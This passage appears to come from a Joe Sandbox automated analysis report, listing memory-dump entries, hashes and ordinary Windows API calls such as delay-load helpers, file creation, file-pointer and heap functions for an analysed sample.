                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 8486539c43d0f7992add794d1db5c77f162d3cba221c3953fa2b4f5ca66796ac
                                                                      • Instruction ID: db87a27f010d87303fc61bb121ae584a67bb874314acc892cd6514eafdc94ec6
                                                                      • Opcode Fuzzy Hash: 8486539c43d0f7992add794d1db5c77f162d3cba221c3953fa2b4f5ca66796ac
                                                                      • Instruction Fuzzy Hash: 93A001E62A918AFC310A72526E0AC3B022DC4C5B65334992FF916C9681A89968552872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE51F
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: PDGu<}
                                                                      • API String ID: 1269201914-3101634298
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE51F
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: PDGu<}
                                                                      • API String ID: 1269201914-3101634298
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE51F
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: PDGu<}
                                                                      • API String ID: 1269201914-3101634298
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE51F
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: PDGu<}
                                                                      • API String ID: 1269201914-3101634298
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007EB7BB: GetOEMCP.KERNEL32(00000000,?,?,007EBA44,?), ref: 007EB7E6
                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,007EBA89,?,00000000), ref: 007EBC64
                                                                      • GetCPInfo.KERNEL32(00000000,007EBA89,?,?,?,007EBA89,?,00000000), ref: 007EBC77
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: CodeInfoPageValid
                                                                      • String ID:
                                                                      • API String ID: 546120528-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,007C9A50,?,?,00000000,?,?,007C8CBC,?), ref: 007C9BAB
                                                                      • GetLastError.KERNEL32(?,00000000,007C8411,-00009570,00000000,000007F3), ref: 007C9BB6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastPointer
                                                                      • String ID:
                                                                      • API String ID: 2976181284-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007E97E5: GetLastError.KERNEL32(?,00801098,007E4674,00801098,?,?,007E40EF,?,?,00801098), ref: 007E97E9
                                                                        • Part of subcall function 007E97E5: _free.LIBCMT ref: 007E981C
                                                                        • Part of subcall function 007E97E5: SetLastError.KERNEL32(00000000,?,00801098), ref: 007E985D
                                                                        • Part of subcall function 007E97E5: _abort.LIBCMT ref: 007E9863
                                                                        • Part of subcall function 007EBB4E: _abort.LIBCMT ref: 007EBB80
                                                                        • Part of subcall function 007EBB4E: _free.LIBCMT ref: 007EBBB4
                                                                        • Part of subcall function 007EB7BB: GetOEMCP.KERNEL32(00000000,?,?,007EBA44,?), ref: 007EB7E6
                                                                      • _free.LIBCMT ref: 007EBA9F
                                                                      • _free.LIBCMT ref: 007EBAD5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorLast_abort
                                                                      • String ID:
                                                                      • API String ID: 2991157371-0
                                                                      • Opcode ID: 5eebab8d2c4cb87fa29ba12c230349ec91c5bcc146c04b4d46c233813a5b5594
                                                                      • Instruction ID: efc0d68a635b1e9bcabaffd55bd6b15d474e0e7558c1d1ea1d063ed5169025ea
                                                                      • Opcode Fuzzy Hash: 5eebab8d2c4cb87fa29ba12c230349ec91c5bcc146c04b4d46c233813a5b5594
                                                                      • Instruction Fuzzy Hash: 34313E31901189EFDF10DF6AE845BAE7FF1EF48320F2580A9E5049B2A1EB395D40DB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C1E55
                                                                        • Part of subcall function 007C3BBA: __EH_prolog.LIBCMT ref: 007C3BBF
                                                                      • _wcslen.LIBCMT ref: 007C1EFD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog$_wcslen
                                                                      • String ID:
                                                                      • API String ID: 2838827086-0
                                                                      • Opcode ID: 88865e6dea47abdcd38230278c8055ee085b92f2afcf90d3359d466ec7261f09
                                                                      • Instruction ID: c74bd2a49bad0d27d267909f490564057988995f8b85753e31f1cd906bf0a9d8
                                                                      • Opcode Fuzzy Hash: 88865e6dea47abdcd38230278c8055ee085b92f2afcf90d3359d466ec7261f09
                                                                      • Instruction Fuzzy Hash: 8E314C71905209EFCF15EF98C949EEEBBF5AF49300F5000AEE445A7252C73A5E00CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,007C73BC,?,?,?,00000000), ref: 007C9DBC
                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 007C9E70
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: File$BuffersFlushTime
                                                                      • String ID:
                                                                      • API String ID: 1392018926-0
                                                                      • Opcode ID: 3638f7e9bf9c1681c5d492ae0213c5cc7a9d98fdb7086d229df49865cca32f34
                                                                      • Instruction ID: 177250ab082c492dd1c9f2878b7228f301959c9770197403ce1d469a29feeff5
                                                                      • Opcode Fuzzy Hash: 3638f7e9bf9c1681c5d492ae0213c5cc7a9d98fdb7086d229df49865cca32f34
                                                                      • Instruction Fuzzy Hash: 4621CE32248285EBC754DF24C899FAABBE4AF55304F08491DF5C687541D32DE90CDBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,007C9F27,?,?,007C771A), ref: 007C96E6
                                                                      • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,007C9F27,?,?,007C771A), ref: 007C9716
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 0fb7f0d23c9a0a510d64d6bce0e1d5ddcce6ca716484ac4b1529497d4235fd1f
                                                                      • Instruction ID: 6549305df30484fa87b7c8b9ab71584c736315f19ce7937a1fbe1f182c828bad
                                                                      • Opcode Fuzzy Hash: 0fb7f0d23c9a0a510d64d6bce0e1d5ddcce6ca716484ac4b1529497d4235fd1f
                                                                      • Instruction Fuzzy Hash: 8021BDB1100344AEE3B08A65CC8DFB7B7DCEB49324F004A1DFA99D62D1C778A8848671
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 007C9EC7
                                                                      • GetLastError.KERNEL32 ref: 007C9ED4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastPointer
                                                                      • String ID:
                                                                      • API String ID: 2976181284-0
                                                                      • Opcode ID: 0eb0c7a32bb24b9864a8cbccb77239d21ea92a65503d4a6109c2ae0d528102d3
                                                                      • Instruction ID: 0148268441dc8485ed843202b1180acd86dc9705997781f04195f0f3b343b796
                                                                      • Opcode Fuzzy Hash: 0eb0c7a32bb24b9864a8cbccb77239d21ea92a65503d4a6109c2ae0d528102d3
                                                                      • Instruction Fuzzy Hash: C411E532600700ABD764C628CC88FA6B7E9AB55370F504A2EE653D26D0D778ED49C760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _free.LIBCMT ref: 007E8E75
                                                                        • Part of subcall function 007E8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,007E4286,?,0000015D,?,?,?,?,007E5762,000000FF,00000000,?,?), ref: 007E8E38
                                                                      • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00801098,007C17CE,?,?,00000007,?,?,?,007C13D6,?,00000000), ref: 007E8EB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocAllocate_free
                                                                      • String ID:
                                                                      • API String ID: 2447670028-0
                                                                      • Opcode ID: 382862ebc557092a079d77992cb7cb6c9e4e349499241fc26b4634ef1cd1de2a
                                                                      • Instruction ID: 7bb0c38b6c77d43f373bbdb7035d2168196d2df01f9d15974f8b8302409e01e9
                                                                      • Opcode Fuzzy Hash: 382862ebc557092a079d77992cb7cb6c9e4e349499241fc26b4634ef1cd1de2a
